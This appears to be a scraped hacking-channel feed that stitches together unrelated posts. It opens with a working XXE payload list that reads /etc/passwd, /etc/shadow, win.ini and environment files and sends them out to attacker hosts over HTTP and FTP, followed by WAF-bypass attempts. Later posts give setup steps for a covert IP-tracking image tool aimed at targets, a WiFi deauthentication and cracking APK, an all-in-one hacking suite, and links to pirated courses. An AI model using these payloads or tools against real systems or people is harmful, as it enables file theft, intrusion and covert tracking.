Javascript 17 gb. https://mega.nz/folder/WXxjXIYA#xvZf40EVxWV7ls9UnzHTQA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑XXE PAYLOADS LIST :


--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------

<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##

<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##

<!ENTITY all "%start;%stuff;%end;">

------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>


## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

source https://gist.github.com/staaldraad/01415b990939494879b4
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME IP HACKING-TRACKING :

F E A T U R E S :

Very high configurable tracking image generation
Tracking links generation
Tracking hided and not recognizable from the target point of view
Integrated Dashboard
Self-tracking prevention
Possibility to stop and start the tracking at any time
Possibility to hide the Dashboard and protect its access with a password
Live tracking reports from the Dashboard
Tracking reports live delivered to a configurable mail address
Different IP analysis services
User-Agent analysis service
Integrate URL shortening service
AllInOne PHP file
No need for a Database
Open Source

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/damianofalcioni/IP-Biter

Deploy IP-Biter

2) Copy ipb.php in your PHP server and optionally create a .htaccess file as described in the next security notes

3) Some configurable parameters are available in the firsts uncommented PHP lines of the ipb.php file, identified by the comment "START CONFIGURATION SECTION"

4) Access the Dashboard

5) Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

6) Create a new configuration

7) When the dashboard is opened without parameters, a new configuration is created

8) Another empty new configuration can be generate clicking the "New" button

9) Configure the tracking image and the advanced setting if needed

10) It is possible to left the original image url empty. In this case an empty image will be used.

12) Add tracking links if needed

13) It is possible to left the original link empty. In this case the link will generate a 404 page.

14) Save the configuration

15) Distribute the generated image or the links to start the tracking

16) You can click the copy button and paste in a html rich email editor like gmail

NOTE: If you try to open the generated image or links but have in the same browser the dashboard page opened and loaded, your request will not be tracked (self-tracking prevention feature)

17) Load an existing configuration

18) When the dashboard is opened with the parameter "uuid", the associated configuration is loaded

19) Another configuration can be loaded pasting the "Track UUID" in the dashboard relative field and clicking the "Load" button

20) The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Detailed fresh Proxies List

https://pastebin.com/9hy2B7Px

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑APK 2020 hacking update all in one :

Information Gathering
View a list of access points and stations (clients) around you (even hidden ones)
View the activity of a specific network (by measuring beacons and data packets) and its clients
Statistics about access points and stations
See the manufacturer of a device (AP or station) from the OUI database
See the signal power of devices and filter the ones that are closer to you
Save captured packets in .cap file
Attacks
Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP
Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
Other
Leave the app running in the background, optionally with a notification
Copy commands or MAC addresses to clipboard
Includes the required tools, no need for manual installation
Includes the Nexmon driver, required library and management utility for BCM4339 and BCM4358 devices
Set commands to enable and disable monitor mode automatically
Crack .cap files with a custom wordlist
Create custom actions and run them on an access point or a client easily
Sort and filter Access Points and Stations with many parameters
Export all gathered information to a file
Add a persistent alias to a device (by MAC) for easier identification

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD THIS APK

https://github.com/chrisk44/Hijacker/releases/download/v1.5-beta.12/Hijacker-release-v1.5-beta.12.apk

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑use Python and SQLite To create a CRUD Contacts Database App with


https://mega.nz/folder/3hhnUIqJ#HtJc2RnXyLs0ZCWym5_eKA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 I want to set my Slackware Linux as a server, so that others can connect to my Linux host via modem dial-up. What should I do? Especially how to make my modem answer the dial?

1) Add this line in /etc/inittab:
d1:345:respawn:/sbin/agetty -mt60 38400,19200,9600,2400,1200 ttyS1
(assuming your modem is on the second serial port)
Note that the redhat is The mingetty cannot be used for this purpose, you can
download mgetty from freesoft.cei.gov.cn to use.

2) if you have the modem will switch you can set it to answer calls, if there is no switch
to check its manual to find out what is AT command set (I do not have modem manual)
to set up this command in / etc /rc.d/rc.local will do.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Comptia Security+ Full Course

https://drive.google.com/open?id=1EPG_Dtzs7F0zWEvWkDJat7umvxWGdHwC

2020 Justin Woll - BeyondSixFigures E-Commerce Profit University

https://mega.nz/folder/kcsjCAQS#SSL1G0jOz94ZSI9i9Qmtkw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW UPDATE (last month) -ALL IN ONE :
HACKTRONIAN Menu :
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKTRONIAN
Information Gathering:
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
reaver
pixiewps
Fluxion
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installation in Linux :
This Tool Must Run As ROOT !!!

1) git clone https://github.com/thehackingsage/hacktronian.git

2) cd hacktronian

3) chmod +x install.sh

4) ./install.sh

That's it.. you can execute tool by typing hacktronian

Installation in Android :

1) Open Termux

2) pkg install git

3) pkg install python

4) git clone https://github.com/thehackingsage/hacktronian.git

5) cd hacktronian

6) chmod +x hacktronian.py

7) python2 hacktronian.py

✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁